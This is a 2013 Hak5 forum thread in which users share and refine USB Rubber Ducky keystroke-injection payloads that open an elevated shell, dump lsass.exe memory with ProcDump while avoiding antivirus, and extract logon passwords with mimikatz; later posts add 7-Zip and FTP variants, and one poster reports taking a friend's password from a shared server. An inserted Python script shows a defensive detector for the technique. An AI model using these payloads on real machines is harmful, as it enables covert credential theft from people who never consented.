Darren Kitchen, posted August 31, 2013

Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/

This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe. While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus. Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the Twin Duck and the largish file size of the .dmp (42 MB on my system), would it be possible to save it locally, then "grep" the important (smaller?) bits out before transferring them over?

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Execute procdump from SD card and save log file to disk ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
ENTER
REM *** GTFO ***
STRING exit
ENTER
REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
REM directory including the version of mimikatz for your target's architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

I'm also curious if a PowerShell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
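From the defender's side, the payload in the opening post (and the 7-Zip and FTP variants later in the thread) leaves two reliable host artefacts: a process-creation event whose command line names lsass together with ProcDump's full-dump switch, and a handle opened on lsass.exe with at least PROCESS_VM_READ and PROCESS_QUERY_INFORMATION rights from a source image that has no business touching it. The script below is an added example, not code from the thread or from Hak5; it uses Sysmon-style field names (EventID 1 and 10, Image, CommandLine, SourceImage, TargetImage, GrantedAccess), runs over constructed sample events rather than real telemetry, and the allow-list of source processes is an assumption to be tuned per estate.

```python
"""Detection logic for the ProcDump -ma lsass.exe technique discussed above.

Added example (not from the thread). Scans constructed, Sysmon-style events
and flags the two observable artefacts of a full lsass dump:
  * EventID 1 (process create): command line naming lsass with a full-dump switch
  * EventID 10 (process access): handle to lsass.exe with VM_READ rights from an
    unexpected source image
"""
import re

# Process access rights from WinNT.h. A minidump needs at least these two
# on the target process; ProcDump typically requests the full mask 0x1FFFFF.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
DUMP_MASK = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Assumption: processes that legitimately open lsass on a typical host.
# Tune this per environment; compare lower-cased full paths.
SOURCE_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed sample events in key=value form (not real telemetry).
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe notes.txt"',
    'EventID=1 Image=E:\\procdump.exe CommandLine="E:\\procdump.exe -accepteula -ma lsass.exe E:\\HOST_lsass.dmp"',
    'EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000',
    'EventID=10 SourceImage=E:\\procdump.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF',
    'EventID=10 SourceImage=C:\\Windows\\System32\\wininit.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF',
]


def parse_event(line):
    """Parse one key=value event line into a dict; quoted values keep their spaces."""
    fields = {}
    for key, value in re.findall(r'(\w+)=("[^"]*"|\S+)', line):
        fields[key] = value.strip('"')
    return fields


def flags_for(event):
    """Return the list of detection names this event triggers (possibly empty)."""
    hits = []
    eid = event.get("EventID")
    if eid == "1":
        cmd = event.get("CommandLine", "").lower()
        # Full memory dump of lsass: the "-ma" switch plus the lsass name,
        # exactly the command line the payload above types.
        if "lsass" in cmd and re.search(r"(^|\s)-ma(\s|$)", cmd):
            hits.append("procdump_full_dump_of_lsass")
    elif eid == "10":
        target = event.get("TargetImage", "").lower()
        source = event.get("SourceImage", "").lower()
        access = int(event.get("GrantedAccess", "0"), 16)
        # Both dump-relevant rights granted on lsass from a non-allow-listed image.
        if (target.endswith("\\lsass.exe")
                and (access & DUMP_MASK) == DUMP_MASK
                and source not in SOURCE_ALLOWLIST):
            hits.append("lsass_handle_with_vm_read")
    return hits


def scan(lines):
    """Run every line through the detections; return (line_index, detection) pairs."""
    findings = []
    for i, line in enumerate(lines):
        for name in flags_for(parse_event(line)):
            findings.append((i, name))
    return findings


if __name__ == "__main__":
    for index, name in scan(SAMPLE_EVENTS):
        print(f"event {index}: {name}")
        print("   ", SAMPLE_EVENTS[index])
```

On the sample data the scan reports the ProcDump command line (event 1) and its handle to lsass (event 3) while staying quiet on the svchost and wininit accesses. The handle rule is the more robust of the two, since renaming procdump.exe or wrapping it in a compressed archive, as later posts suggest, changes nothing about the access rights it must request; pair it with an allow-list built from the host's own baseline rather than the constructed one here.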
b00stfr3ak, posted September 1, 2013

I took a stab at it and the following is what I came up with: the ducky starts an admin cmd prompt and launches a powershell command that has been base64 encoded so it bypasses execution policy, and will dump the lsass process into c:\windows\temp\lsass.dmp. Once that is done it exits that shell (if the shell stays open nothing else can touch that file) and starts a new lower priv shell just to read the file and dump it to a listening server, also all through powershell. The code is at https://github.com/b00stfr3ak/ducky_lsass_dump

I plan on combining the scripts I have written into a better menu selection because they use a lot of the same code, but that will come in a week or two.
bwall, posted September 1, 2013

I had posted a payload a while back here on the forums that made the current user attempt to send an NTLMv2 auth to a remote IP (kind of different but I figured it warranted a mention). The limitation would be that it only affects the current user and requires a remote server to grab the auth (https://github.com/bwall/BAMF/blob/master/IntegrationQueue/static/cifstrap.py).
waddell, posted September 2, 2013

I wrote the same thing but instead uploads to an ftp server quietly in the background. You may want to make a rule for windows firewall with netsh first. Not sure if this would set off AV or not, but you only have to plug the ducky in long enough to write the files and start the process. After uploading it literally deletes itself. https://forums.hak5.org/index.php?/topic/30160-payload-ftp-lsass-grab/

Are you only interested in doing this through external storage? If not, you may consider using your exfiltration to backup the dump file remotely once it's created.

Also, you can send commands to mimikatz; it might look like this (change dmp file name if needed):

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

Edited September 2, 2013 by waddell
Jonny190, posted September 6, 2013

My duck encoder 2.6 won't encode the "|" symbol correctly. I'm in the UK but I've also tried the US language as well, but when the duck is entering the symbol it displays empty in UK and as a "^" in US. Any help would be great.
nickfrosty, posted September 6, 2013

To help speed up the transfer speed, you could use a normal flash drive instead of a twin duck. The script will look for any drive labeled "DUCKY", so simply label your normal flash drive "DUCKY" and either don't use the twin duck firmware or don't label the mass storage drive of the twin duck something else. Then when you run the payload, just make sure your normal flash drive is plugged in first and the drivers for it are loaded. Then you are good to go!
parkour86, posted September 6, 2013

I can't get mimikatz to read the passwords from the dmp file I created from my second computer. It keeps showing the password for the computer I'm on. Here are the steps I did:

mimikatz.exe
sekurlsa::minidump lsass.dmp
privilege::debug
sekurlsa::logonPasswords full

Any help would be great. Thanks

Edit: I found the problem. I'm supposed to use the x64 version under the Alpha directory and not under the root directory. Plus it's in English which helps a lot.

Edited September 6, 2013 by parkour86
parkour86, posted September 7, 2013

Anyone know how the lsass.exe file works? I was able to get mine and one of my friends' passwords using the payload on a server we all use but was unable to get my other friend's. Does lsass somehow erase the password cache after some time? Using powershell I was able to tell that lsass.exe has been running since the beginning of August, which is when the server was last rebooted. Thanks.
no42, posted September 7, 2013

> My duck encoder 2.6 won't encode the "|" symbol correctly. I'm in the UK but I've also tried the US language as well, but when the duck is entering the symbol it displays empty in UK and as a "^" in US. Any help would be great.

That's very odd, as it works fine for me, and I'm temporarily residing in the UK at the moment. Run this through the encoder; it will help me debug your problem.

DELAY 2000
STRING qwertyuiopasdfghjklzxcvbnm
DELAY 500
ENTER
STRING QWERTYUIOPASDFGHJKZXCVBNM
DELAY 500
ENTER
STRING 1234567890-=
DELAY 500
ENTER
STRING !"£$%^&*()_+
DELAY 500
ENTER
STRING `[];'#,./
DELAY 500
ENTER
STRING ~{}:@~|<>? \ |
DELAY 500
ENTER
STRING €
ENTER
tom564, posted September 7, 2013

> That's very odd, as it works fine for me, and I'm temporarily residing in the UK at the moment. Run this through the encoder; it will help me debug your problem.
>
> DELAY 2000
> STRING qwertyuiopasdfghjklzxcvbnm
> DELAY 500
> ENTER
> STRING QWERTYUIOPASDFGHJKZXCVBNM
> DELAY 500
> ENTER
> STRING 1234567890-=
> DELAY 500
> ENTER
> STRING !"£$%^&*()_+
> DELAY 500
> ENTER
> STRING `[];'#,./
> DELAY 500
> ENTER
> STRING ~{}:@~|<>? \ |
> DELAY 500
> ENTER
> STRING €
> ENTER

I am also in the UK and just ran that using duck encoder 2.6 with -l uk:

qwertyuiopasdfghjklzxcvbnm
QWERTYUIOPASDFGHJKZXCVBNM
1234567890-=
!"$%^&*()_+
`[];,./
~{}:@~<>?
€

It appears that several symbols don't show up.

Edited September 7, 2013 by tom564
no42, posted September 8, 2013

Aah, when you use -l uk, you're using the built-in language map that may be slightly older. Update the SVN repository and try:

java -jar encoder.jar -l resources\gb.properties -i input.txt -o inject.bin

I've changed some of the country codes to ISO-3166-1 to avoid confusion as the Ducky hits worldwide (UK is Ukraine); GB is Great Britain following ISO-3166-1 compliance. Otherwise the new gb.properties file can be downloaded from here: gb.properties

Edited September 8, 2013 by midnitesnake
tom564, posted September 8, 2013

> Aah, when you use -l uk, you're using the built-in language map that may be slightly older. Update the SVN repository and try:
>
> java -jar encoder.jar -l resources\gb.properties -i input.txt -o inject.bin
>
> I've changed some of the country codes to ISO-3166-1 to avoid confusion as the Ducky hits worldwide (UK is Ukraine); GB is Great Britain following ISO-3166-1 compliance. Otherwise the new gb.properties file can be downloaded from here: gb.properties

Thanks, it now works fine for me.
Darren Kitchen (author), posted September 11, 2013

Some helpful comments from YouTube regarding this script:

> put 7-zip (7za.exe) on duck, execute it (will not be picked up by antivirus for sure) and then copy compressed file to duck. I expect those dumps to compress pretty well ;-)

> using 7zip max compression gets the size down to 10MB so it will reduce the time by 1/3.
DyFukA, posted September 12, 2013

This seems to be working the best for me. I've got it down to about 1:10 on my computer. 7z format works the best as far as speed and size. Not really sure what else can be done. Any ideas?

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
REM http://www.7-zip.org/download.html
REM
REM Target: Windows Vista/7/8, Win32/x64
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
ENTER
REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
REM directory including the version of mimikatz for your target's architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

Edited September 12, 2013 by DyFukA
Xcellerator, posted September 13, 2013

Or you can try a tool called Mpress. I use a Teensy board which only has 128K of memory. Using Mpress I got mimikatz down from 134K to 61K. Still runs perfectly; I've encountered no execution issues whatsoever. Works with Win32+ binaries as well, so you get 64-bit support too.
Hackman1970, posted September 18, 2013

I had problems with Norwegian keyboards and this key ^ so I did some changes in the code to make it work in Norwegian. First I tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE, which did not work for me. Instead of using no.properties I use US standard and make the computer change from Norwegian to US English. Have tested this on my Norwegian Windows 7 x64, worked perfect for me :) Probably the way to go instead of dk.properties and se.properties too? Check out my modified code:

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
REM
REM Modified to circumvent norwegian keyboards by Hackman1970
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
REM http://www.7-zip.org/download.html
REM
REM Target: Windows Vista/7/8, Win32/x64
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
REM *** Input Language Swap to circumvent problems with norwegian
REM *** Norwegian Windows 7 used to have US english as second language installed by default
REM *** Using shortcut ALT-SHIFT to toggle between NO and US
ALT-SHIFT
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500
REM *** For norwegian I tried to change y[es] to j[a]
REM ALT y
REM ALT j
REM *** The above did not work but LEFTARROW ENTER works :)
LEFTARROW
ENTER
DELAY 500
REM *** Swap Input Language again for cmd.exe shell
ALT-SHIFT
DELAY 200
REM *** Define DUCKY drive as %duck%
ENTER
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
ENTER
REM *** Swap Input Language again, hopefully back to norwegian
ALT-SHIFT
REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
REM directory including the version of mimikatz for your target's architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:)
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

Is this the way to go, or does anyone have a fix for no.properties?

Edited September 18, 2013 by Hackman1970